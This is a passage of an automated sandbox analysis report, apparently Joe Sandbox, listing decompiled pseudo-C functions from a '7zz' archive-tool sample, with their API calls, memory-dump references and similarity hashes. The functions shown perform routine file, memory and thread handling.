                                                                                  • Instruction Fuzzy Hash: 80D017B1A442159BDB08FBA8944236D72A1AB08308F10857FA41AE3780EB785900866A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040B154 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040B154(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindClose(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                                                                  0x0040b155
                                                                                  0x0040b157
                                                                                  0x0040b15c
                                                                                  0x0040b170
                                                                                  0x0040b173
                                                                                  0x0040b15e
                                                                                  0x0040b15f
                                                                                  0x0040b167
                                                                                  0x0040b16d
                                                                                  0x00000000
                                                                                  0x0040b169
                                                                                  0x0040b16c
                                                                                  0x0040b16c
                                                                                  0x0040b167

                                                                                  APIs
                                                                                  • FindClose.KERNELBASE(00000000,?,0040B18C), ref: 0040B15F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 1863332320-0
                                                                                  • Opcode ID: 44b45b29d53ae0ee441c7631a48af92bc4367c4c071d9c8d09f5d2f54756129b
                                                                                  • Instruction ID: b21785a81a83a5848f3eefaff4503489f3c43cb4ff3f3a84b902145481c2820f
                                                                                  • Opcode Fuzzy Hash: 44b45b29d53ae0ee441c7631a48af92bc4367c4c071d9c8d09f5d2f54756129b
                                                                                  • Instruction Fuzzy Hash: 14D0123110426186CA641E3C78589C733D89A463B03214B6AF4B4D72E1D3749CD356EC
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00401917 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 82%
                                                                                  			E00401917(intOrPtr* __ecx) {
				char* _v8;
				int _t3;

				_push(__ecx);
				 *__ecx = 0x47a258; // executed
				_t3 = SetConsoleCtrlHandler(E004018DA, 0); // executed
				if(_t3 == 0) {
					_v8 = "SetConsoleCtrlHandler fails";
					return L0046B8F4( &_v8, 0x47cf70);
				}
				return _t3;
			}





                                                                                  0x0040191a
                                                                                  0x00401922
                                                                                  0x00401928
                                                                                  0x00401930
                                                                                  0x0040193b
                                                                                  0x00000000
                                                                                  0x00401942
                                                                                  0x00401948

                                                                                  APIs
                                                                                  • SetConsoleCtrlHandler.KERNELBASE(004018DA,00000000,?,?,00405F11), ref: 00401928
                                                                                    • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleCtrlExceptionHandlerRaise
                                                                                  • String ID:
                                                                                  • API String ID: 118816144-0
                                                                                  • Opcode ID: 7d417b143ea1433f04c1f19a4f714dece2fd5a2579662ce84d2d8607feb3290c
                                                                                  • Instruction ID: 6ced6f053643f7caf5f562c5cf66968f1a01d4a1bbfb89d95e4470d53f11f31c
                                                                                  • Opcode Fuzzy Hash: 7d417b143ea1433f04c1f19a4f714dece2fd5a2579662ce84d2d8607feb3290c
                                                                                  • Instruction Fuzzy Hash: 21D05BB024030876D710EF958D06B4D369CDB81748F20809BE104B22D1E7F9A500571E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040B9C0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040B9C0(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                                                                  0x0040b9c1
                                                                                  0x0040b9c3
                                                                                  0x0040b9c8
                                                                                  0x0040b9dc
                                                                                  0x0040b9df
                                                                                  0x0040b9ca
                                                                                  0x0040b9cb
                                                                                  0x0040b9d3
                                                                                  0x0040b9d9
                                                                                  0x00000000
                                                                                  0x0040b9d5
                                                                                  0x0040b9d8
                                                                                  0x0040b9d8
                                                                                  0x0040b9d3

                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,0040B938,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?,59@), ref: 0040B9CB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  • Opcode ID: 33fa7bc332402748847c426bb7038baaea435e55007e32936245ae0630d27a3e
                                                                                  • Instruction ID: 00a41a6e43d9e9d2736f99314ed8b7868d2ac66bf7d75e366eb682c8f7b18308
                                                                                  • Opcode Fuzzy Hash: 33fa7bc332402748847c426bb7038baaea435e55007e32936245ae0630d27a3e
                                                                                  • Instruction Fuzzy Hash: 84D0127110416146DE642E3D7C445C737D8AA423303210B6BF0B5D32E1D3748CD356D8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040BD82 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 58%
                                                                                  			E0040BD82(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}




                                                                                  0x0040bd90
                                                                                  0x0040bd98
                                                                                  0x0040bd9c

                                                                                  APIs
                                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 0040BD90
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileTime
                                                                                  • String ID:
                                                                                  • API String ID: 1425588814-0
                                                                                  • Opcode ID: 159763ee70248e45816b5ed0686b6e88efdf274a22e637b9fc2352e1e560d6e6
                                                                                  • Instruction ID: 904542211cf95c1dba31585a344c430934b25bd4ea8d40f4864e79ca3744c005
                                                                                  • Opcode Fuzzy Hash: 159763ee70248e45816b5ed0686b6e88efdf274a22e637b9fc2352e1e560d6e6
                                                                                  • Instruction Fuzzy Hash: 62C04C36158105FF8F020F70DC04C1EBBA6AB95711F10CA18B259C4070C7338034EB02
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00467AD0 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00467AD0(intOrPtr* __ecx, intOrPtr __edx, char _a4) {
				intOrPtr _t4;
				long _t5;
				intOrPtr* _t12;

				_t12 = __ecx;
				_t4 = E0046CD08(0, 0, __edx, _a4, 0,  &_a4); // executed
				 *_t12 = _t4;
				if(_t4 == 0) {
					_t5 = GetLastError();
					if(_t5 == 0) {
						return 1;
					}
					return _t5;
				} else {
					return 0;
				}
			}






                                                                                  0x00467ad8
                                                                                  0x00467ae4
                                                                                  0x00467aec
                                                                                  0x00467af1
                                                                                  0x00467af8
                                                                                  0x00467b00
                                                                                  0x00000000
                                                                                  0x00467b02
                                                                                  0x00467b07
                                                                                  0x00467af3
                                                                                  0x00467af5
                                                                                  0x00467af5

                                                                                  APIs
                                                                                    • Part of subcall function 0046CD08: CreateThread.KERNELBASE ref: 0046CD49
                                                                                    • Part of subcall function 0046CD08: GetLastError.KERNEL32(?,00467AE9,00000000,00000000,004148ED,?,00000000,?,?,00414677,?,?), ref: 0046CD53
                                                                                  • GetLastError.KERNEL32(?,?,00414677,?,?), ref: 00467AF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 665435222-0
                                                                                  • Opcode ID: 75c33af1d3ad033ecb797aba507411330867c6b5fb6462af91c85880dadd199e
                                                                                  • Instruction ID: f2b2db5cd6f09a71537b1524ed132628cfc4aafc29f8b6fc8c24ade46cb63582
                                                                                  • Opcode Fuzzy Hash: 75c33af1d3ad033ecb797aba507411330867c6b5fb6462af91c85880dadd199e
                                                                                  • Instruction Fuzzy Hash: 9CE086B22042015AE3109A549C05F6766989B90B45F04443EB944C6180F6A49950C76A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004585C0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004585C0(long __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = VirtualAlloc(0, __ecx, 0x1000, 4); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                                                                  0x004585c2
                                                                                  0x004585d1
                                                                                  0x004585d7
                                                                                  0x004585c4
                                                                                  0x004585c6
                                                                                  0x004585c6

                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,0048DE00,00001000,00000004,00413C47,0048DE00,00000000,00414B97,00000500,0048DE00,00000000,00490AB0), ref: 004585D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 60f2cb083d3e1da89fbc138163c0eb26e01a85e12df0a1ae00077eedd1479cf7
                                                                                  • Instruction ID: c1be663b654be8f4f03ee9fe28526b1f2e61089ce9361c0db0236efe8358a087
                                                                                  • Opcode Fuzzy Hash: 60f2cb083d3e1da89fbc138163c0eb26e01a85e12df0a1ae00077eedd1479cf7
                                                                                  • Instruction Fuzzy Hash: BFB012B039124475FE6843344C0BF6F2140A390B47F50406CB705E80C4FFE05840541D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004585E0 Relevance: 1.3, APIs: 1, Instructions: 7COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E004585E0(void* __ecx) {
				void* _t1;
				int _t2;

				if(__ecx != 0) {
					_t2 = VirtualFree(__ecx, 0, 0x8000); // executed
					return _t2;
				}
				return _t1;
			}





                                                                                  0x004585e2
                                                                                  0x004585ec
                                                                                  0x00000000
                                                                                  0x004585ec
                                                                                  0x004585f2

                                                                                  APIs
                                                                                  • VirtualFree.KERNELBASE(0040F696,00000000,00008000,00413C3C,0048DE00,00000000,00414B97,00000500,0048DE00,00000000,00490AB0), ref: 004585EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: 66ab59525338a2af16dc22d106436c8a083152c3c5af49293173989fc1d300f5
                                                                                  • Instruction ID: 99068d3d514b32bd65c0f8a450bbacd2dc59915ab1aca7adb646860191089de3
                                                                                  • Opcode Fuzzy Hash: 66ab59525338a2af16dc22d106436c8a083152c3c5af49293173989fc1d300f5
                                                                                  • Instruction Fuzzy Hash: 9DB012F034130131FD3803110E05B1B10005740702E94802C7506B40C14D589804850C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Function 00441925 Relevance: 20.4, APIs: 10, Strings: 1, Instructions: 1131COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 87%
                                                                                  			E00441925(intOrPtr __ecx, signed int __edx) {
				void* __edi;
				intOrPtr _t641;
				intOrPtr* _t642;
				int _t650;
				char _t652;
				intOrPtr* _t654;
				intOrPtr _t669;
				signed int _t681;
				int _t700;
				intOrPtr* _t723;
				intOrPtr* _t729;
				int _t730;
				intOrPtr* _t731;
				intOrPtr* _t739;
				intOrPtr* _t744;
				intOrPtr* _t746;
				intOrPtr* _t754;
				intOrPtr* _t758;
				signed int _t766;
				intOrPtr* _t773;
				intOrPtr* _t775;
				intOrPtr* _t783;
				int _t788;
				intOrPtr _t790;
				struct _CRITICAL_SECTION* _t793;
				intOrPtr _t796;
				signed int _t797;
				void* _t805;
				int _t845;
				intOrPtr* _t852;
				int _t856;
				signed int _t857;
				int _t858;
				intOrPtr* _t865;
				intOrPtr* _t870;
				intOrPtr _t872;
				intOrPtr* _t880;
				intOrPtr* _t898;
				signed int _t902;
				signed int _t903;
				void* _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				intOrPtr* _t911;
				int _t928;
				intOrPtr _t931;
				signed int _t934;
				intOrPtr _t963;
				void* _t985;
				signed int _t996;
				signed int _t1133;
				signed int _t1135;
				signed int _t1154;
				signed int _t1155;
				void* _t1158;
				signed int _t1159;
				intOrPtr* _t1160;
				intOrPtr _t1161;
				struct _CRITICAL_SECTION* _t1163;
				void* _t1164;
				int _t1165;
				signed int _t1170;
				intOrPtr* _t1172;
				int _t1173;
				intOrPtr _t1174;
				signed int _t1175;
				int _t1176;
				intOrPtr* _t1177;
				signed int _t1178;
				intOrPtr _t1179;
				intOrPtr _t1180;
				intOrPtr _t1182;
				intOrPtr _t1183;
				intOrPtr _t1184;
				void* _t1186;
				void* _t1188;
				void* _t1189;
				void* _t1198;
				void* _t1205;

				_t1146 = __edx;
				L0046B890(E00478DCE, _t1186);
				_t1189 = _t1188 - 0x3a0;
				 *((intOrPtr*)(_t1186 - 0x24)) = __ecx;
				_t931 =  *((intOrPtr*)(_t1186 + 0x10));
				_t928 = 0;
				_t1154 = 0;
				 *((intOrPtr*)(_t1186 - 0x60)) = __edx;
				 *(_t1186 - 0x18) = 0;
				 *(_t1186 - 0x14) = 0;
				 *((intOrPtr*)(_t1186 - 0x30)) = 0;
				 *(_t1186 - 0x2c) = 0;
				 *((intOrPtr*)(_t1186 - 0x48)) = 0;
				 *(_t1186 - 0x44) = 0;
				if( *((intOrPtr*)(_t931 + 8)) <= 0) {
					L6:
					_t641 =  *((intOrPtr*)(_t1186 + 0x18));
					_t1194 = _t641 - _t928;
					if(_t641 != _t928) {
						 *(_t1186 - 0x18) =  *(_t1186 - 0x18) +  *((intOrPtr*)(_t641 + 4));
						asm("adc [ebp-0x14], ebx");
					}
					_t642 =  *((intOrPtr*)(_t1186 + 0x1c));
					_t1155 = 1;
					 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + _t1155;
					asm("adc [ebp-0x14], ebx");
					 *((intOrPtr*)( *_t642 + 0xc))(_t642,  *(_t1186 - 0x18),  *(_t1186 - 0x14));
					_t1170 =  *(_t1186 + 0x14);
					E00439D90(_t1186 - 0x3ac, _t1194, _t1170);
					_t934 =  *(_t1170 + 0x40);
					 *(_t1186 - 4) = _t1155;
					 *(_t1186 - 0x18) = _t928;
					 *(_t1186 - 0x14) = _t928;
					 *(_t1186 - 0x20) = _t934;
					if(_t934 > 0x400) {
						 *(_t1186 - 0x20) = 0x400;
					}
					E0043DF8F(_t1186 - 0x2ec);
					 *(_t1186 - 4) = 2;
					if(_t1170 == _t928) {
						L12:
						 *(_t1186 - 0xd) = _t928;
						L13:
						_t1198 =  *(_t1186 - 0x2c) - _t928;
						if(_t1198 <= 0 && (_t1198 < 0 ||  *((intOrPtr*)(_t1186 - 0x30)) <= _t1155)) {
							 *(_t1186 - 0xd) = _t928;
						}
						if( *(_t1186 - 0xd) == _t928) {
							L37:
							_push( *((intOrPtr*)(_t1186 + 0x1c)));
							_push( *((intOrPtr*)(_t1186 + 0x18)));
							_push(_t1170);
							_push( *((intOrPtr*)(_t1186 + 0x10)));
							_push( *((intOrPtr*)(_t1186 + 0xc)));
							_push( *(_t1186 + 8));
							_t928 = L00443231( *((intOrPtr*)(_t1186 - 0x24)),  *((intOrPtr*)(_t1186 - 0x60)));
							goto L124;
						} else {
							_t652 =  *((intOrPtr*)( *((intOrPtr*)(_t1170 + 0xc))));
							 *((char*)(_t1186 - 0x39)) = _t652;
							if(_t652 != _t928) {
								L21:
								if(_t652 != 0xc) {
									L33:
									if( *((char*)(_t1186 - 0x39)) == 0xe) {
										_t902 =  *(_t1186 - 0x20);
										_t1133 = (0 |  *((intOrPtr*)(_t1170 + 0x20)) - _t928 > 0x00000000) + 1;
										_t903 = _t902 / _t1133;
										_t1146 = _t902 % _t1133;
										 *(_t1186 - 0x2ac) = _t1133;
										 *(_t1186 - 0x20) = _t903;
										if(_t903 <= _t1155) {
											 *(_t1186 - 0xd) = _t928;
										}
									}
									L36:
									if( *(_t1186 - 0xd) != _t928) {
										E00405B9F(_t1186 - 0x5c);
										 *((intOrPtr*)(_t1186 - 0x5c)) = 0x47b8ac;
										_push(0x10);
										 *(_t1186 - 4) = 3;
										_t654 = L004079F2();
										__eflags = _t654 - _t928;
										if(_t654 == _t928) {
											_t1172 = 0;
											__eflags = 0;
										} else {
											 *(_t654 + 4) = _t928;
											 *(_t654 + 0xc) = _t928;
											 *_t654 = 0x47b89c;
											_t1172 = _t654;
										}
										__eflags = _t1172 - _t928;
										 *((intOrPtr*)(_t1186 - 0x64)) = _t1172;
										 *((intOrPtr*)(_t1186 - 0x28)) = _t1172;
										if(_t1172 != _t928) {
											 *((intOrPtr*)( *_t1172 + 4))(_t1172);
										}
										_push(1);
										_push( *((intOrPtr*)(_t1186 + 0x1c)));
										 *(_t1186 - 4) = 4;
										E00441191(_t1172);
										L00443921(_t1186 - 0x13c);
										_push( *((intOrPtr*)(_t1172 + 0xc)));
										 *(_t1186 - 4) = 5;
										_push( *(_t1186 - 0x20));
										L0040F265(_t1186 - 0x13c);
										L0044295A(_t1186 - 0xe4, 0x10000);
										L00467C60(_t1186 - 0xd8);
										 *(_t1186 - 0xc0) = _t928;
										 *(_t1186 - 4) = 6;
										 *((intOrPtr*)(_t1186 - 0xbc)) = _t1186 - 0xe4;
										L00443B5C(_t1186 - 0xb8);
										 *(_t1186 - 4) = 7;
										L00443A5E(_t1186 - 0x90);
										 *(_t1186 - 4) = 8;
										E00404AD0(_t1186 - 0xa4, 4);
										 *((intOrPtr*)(_t1186 - 0xa4)) = 0x47a7f0;
										 *(_t1186 - 4) = 9;
										E00404AD0(_t1186 - 0x7c, 4);
										 *((intOrPtr*)(_t1186 - 0x7c)) = 0x47a668;
										 *(_t1186 - 4) = 0xa;
										_t1173 = L0040E850(_t1186 - 0xe4,  *(_t1186 - 0x20) << 9, _t928);
										__eflags = _t1173 - _t928;
										if(_t1173 == _t928) {
											_t1174 =  *((intOrPtr*)(_t1186 + 0x10));
											_t1158 = 0;
											__eflags =  *((intOrPtr*)(_t1174 + 8)) - _t928;
											if( *((intOrPtr*)(_t1174 + 8)) <= _t928) {
												L50:
												_t1175 =  *(_t1186 - 0x20);
												__eflags = _t1175 - _t928;
												if(_t1175 <= _t928) {
													L52:
													_t1159 = 0;
													__eflags =  *(_t1186 - 0x20) - _t928;
													if( *(_t1186 - 0x20) <= _t928) {
														L63:
														 *(_t1186 - 0x2c) =  *(_t1186 - 0x2c) | 0xffffffff;
														 *(_t1186 - 0x40) = _t928;
														 *(_t1186 - 0x38) = _t928;
														_t669 =  *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 8));
														__eflags = _t669 - _t928;
														if(_t669 <= _t928) {
															L123:
															E00440D28( *((intOrPtr*)(_t1186 - 0x24)), _t1146, _t1186 - 0x5c,  *((intOrPtr*)(_t1186 + 0x18)));
															 *(_t1186 - 4) = 9;
															E00408604(_t1186 - 0x7c);
															 *(_t1186 - 4) = 8;
															E00408604(_t1186 - 0xa4);
															 *(_t1186 - 4) = 7;
															L00442DE5(_t1186 - 0x90);
															 *(_t1186 - 4) = 6;
															L00442E79(_t1186 - 0xbc);
															 *(_t1186 - 4) = 5;
															L0044296D(_t1186 - 0xe4);
															 *(_t1186 - 4) = 4;
															L0044395A(_t1186 - 0x13c, __eflags);
															 *(_t1186 - 4) = 3;
															L0043361B(_t1186 - 0x28);
															 *(_t1186 - 4) = 2;
															L00443C57(_t1186 - 0x5c);
															goto L124;
														} else {
															goto L64;
														}
														do {
															L64:
															__eflags =  *((intOrPtr*)(_t1186 - 0x74)) -  *(_t1186 - 0x20);
															if( *((intOrPtr*)(_t1186 - 0x74)) >=  *(_t1186 - 0x20)) {
																L95:
																_t681 =  *(_t1186 - 0x38) << 2;
																 *(_t1186 - 0x1c) = _t681;
																_t963 =  *((intOrPtr*)(_t681 +  *((intOrPtr*)(_t1186 - 0xac))));
																__eflags =  *((intOrPtr*)(_t963 + 0x41)) - _t928;
																if( *((intOrPtr*)(_t963 + 0x41)) == _t928) {
																	_t1160 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0x10)) + 0xc)) + _t681));
																	L0044375C(_t1186 - 0x294);
																	__eflags =  *((intOrPtr*)(_t1160 + 1)) - _t928;
																	 *(_t1186 - 4) = 0x18;
																	if( *((intOrPtr*)(_t1160 + 1)) == _t928) {
																		L99:
																		L00443768(_t1186 - 0x294,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1186 + 0xc)) + 0xc)) +  *(_t1160 + 8) * 4)));
																		_push(_t1186 - 0x294);
																		__eflags = L0043F571( *((intOrPtr*)(_t1186 - 0x60)), _t1146);
																		if(__eflags != 0) {
																			_t1176 = 0x80004001;
																			L146:
																			 *(_t1186 - 4) = 0xa;
																			E0043CD47(_t1186 - 0x294, __eflags);
																			 *(_t1186 - 4) = 9;
